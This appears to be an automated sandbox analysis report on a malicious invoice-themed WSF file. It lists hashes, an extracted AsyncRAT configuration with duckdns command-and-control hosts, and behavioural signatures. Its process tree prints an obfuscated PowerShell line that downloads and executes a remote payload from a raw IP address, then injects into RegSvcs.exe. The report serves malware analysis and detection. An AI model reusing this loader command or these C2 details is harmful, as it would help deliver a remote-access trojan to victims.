Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
15/11/2023, 17:36
Static task
static1
Behavioral task
behavioral1
Sample
Invoice#57348024.wsf
Resource
win7-20231020-en
General
-
Target
Invoice#57348024.wsf
-
Size
113KB
-
MD5
fa5cbc00cbaa12bb4b45fca8d5075587
-
SHA1
5d4c9493654c9abd21354bb9f3424726ade1b8f3
-
SHA256
c57ecd0aeea0978f281e66541e3645290619eb8bc36882a2155c3cd61fee91af
-
SHA512
0b1f0107e347b37f92de84dd8f277dda4cba2bec70f6342801b8c51c4efa216a16be68aeeac42f95b7d90c44e548a541c68488ce1242b6d04b777439c7bff219
-
SSDEEP
768:H88888888888g88888888888Z88888888888V88888888888h88888888888g88t:u
Malware Config
Extracted
asyncrat
| Edit 3LOSH RAT
RxR*
rxrr.duckdns.org:6606
rxrr.duckdns.org:7707
rxrr.duckdns.org:8808
AsyncMutex_86734khgs1
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/2708-40-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2532 WScript.exe 9 3380 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4748 set thread context of 2708 4748 powershell.exe 110 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 3380 powershell.exe 3380 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 4748 powershell.exe 2708 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3380 powershell.exe Token: SeDebugPrivilege 4748 powershell.exe Token: SeDebugPrivilege 2708 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2708 RegSvcs.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2532 wrote to memory of 3380 2532 WScript.exe 85 PID 2532 wrote to memory of 3380 2532 WScript.exe 85 PID 4828 wrote to memory of 1788 4828 WScript.exe 107 PID 4828 wrote to memory of 1788 4828 WScript.exe 107 PID 1788 wrote to memory of 4748 1788 cmd.exe 109 PID 1788 wrote to memory of 4748 1788 cmd.exe 109 PID 4748 wrote to memory of 2708 4748 powershell.exe 110 PID 4748 wrote to memory of 2708 4748 powershell.exe 110 PID 4748 wrote to memory of 2708 4748 powershell.exe 110 PID 4748 wrote to memory of 2708 4748 powershell.exe 110 PID 4748 wrote to memory of 2708 4748 powershell.exe 110 PID 4748 wrote to memory of 2708 4748 powershell.exe 110 PID 4748 wrote to memory of 2708 4748 powershell.exe 110 PID 4748 wrote to memory of 2708 4748 powershell.exe 110 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice#57348024.wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/T2.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3380
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\libraries.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\libraries.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\libraries.ps1'"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2708
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5026d93a446c50e4ae9aa47a15d0e923f
SHA1f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
210B
MD5440e905a6fcf6bcc0ffe763896e21044
SHA189bf89ca871095dd7431147a4e0c993bfdba897e
SHA256aae3e34c1f6bf5eaf7c91afec528d24ac1b10272705be506653b29df17d6e834
SHA512f324dbff528e9579f81af84c09ab45ef87cd8e516cb22a5f99e432d4d1ca528f3e5d8f7a1f479076a89c18cd44bbaa10df4f6a1fcdc3fe8937febadb892d89fd
-
Filesize
326KB
MD5d253b8760d01942b6f0cf89884d8ce6f
SHA1f5c10af0337c62aaf7403fb88cfe5671ef317d56
SHA2561c2e5ff87905fd9a30d3498c37374bcb9944caaf229dd8d9d85ffa25d3ab3ae4
SHA51277049aaa93bcba3a101b0f93571b3b633c2b98876655e63ba427219eb20fe7256f500edad9b840494ccddb5ca55f9baa8eec36020f099887fec86e4feadb8782
-
Filesize
691B
MD5882c260115cfacc236251d065cc23c4c
SHA1cee58dd936e493370224db57ca49c4d6c0cbfeff
SHA2561d1595fdd363891dd2d9d081059b2dcbca1edc72c80b6c637436a9090ba2564a
SHA512d1279bcc0150ba96164445a98fdb5ff5ef6cde81460af71612ee0f0a7ac8155f9d3a73aa26ccb53a9da6493e078aef42e20ca26011f0f5aa855f5ced61236641